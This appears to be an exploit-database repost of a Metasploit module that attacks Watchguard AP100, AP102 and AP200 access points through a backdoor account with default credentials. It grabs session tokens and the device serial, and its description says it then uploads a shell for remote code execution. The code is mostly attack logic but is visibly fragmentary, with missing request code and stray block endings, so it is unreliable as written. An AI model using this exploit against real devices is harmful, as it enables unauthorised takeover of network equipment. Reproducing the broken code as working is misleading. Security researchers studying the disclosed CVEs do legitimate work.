Exploits / Vulnerability Discovered : 2018-09-14 |
Type : webapps |
Platform : linux
This exploit / vulnerability Watchguard ap100 ap102 ap200 1.2.9.15 remote code execution (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Watchguard AP Backdoor Shell',
'Description' => 'Watchguard AP\'s have a backdoor account with known credentials. This can be used to
gain a valid web session on the HTTP administration interface. The administrator
can then upload a shell directly to the web root to execute it.
This module can also be used if you have legitimate access credentials to the device.',
'References' =>
[
['CVE', 'CVE-2018-10575'],
['CVE', 'CVE-2018-10576'],
['CVE', 'CVE-2018-10577'],
['URL', 'http://seclists.org/fulldisclosure/2018/May/12'],
['URL', 'https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy'],
],
'Author' => 'Stephen Shkardoon ', # ss23 / @ss2342
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Targets' => [ [ 'Automatic', { } ] ],
'DefaultTarget' => 0,
'Arch' => ARCH_MIPSBE,
))
register_options(
[
Opt::RPORT(443),
#Opt::SSL(true),
OptString.new('WG_USER', [ true, 'The username to authenticate as', 'admin']),
OptString.new('WG_PASS', [ true, 'The password for the specified username', '1234']),
])
end
if res.nil? || res.get_cookies.empty?
fail_with(Failure::NotFound, 'Unable to obtain a valid session with provided credentials')
end
# We have a valid session, so we should pull out the access credentials and find the serial number
sysauth = res.get_cookies.scan(/(sysauth=\w+);*/).flatten[0]
stok = res.redirection.to_s.scan(/;(stok=\w+)/).flatten[0]
if res.nil? || res.code != 200
fail_with(Failure::NotFound, 'Unable to request serial')
end
# Pull out the serial and store it for later
# var device_serial = "20AP0XXXXXXXX";
if res.body.match(/device_serial = "(\w+)";/)
serial = $1
else
fail_with(Failure::NotFound, 'Unable to find serial in response')
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("Failed to connect to the web server")
return nil
end
end
end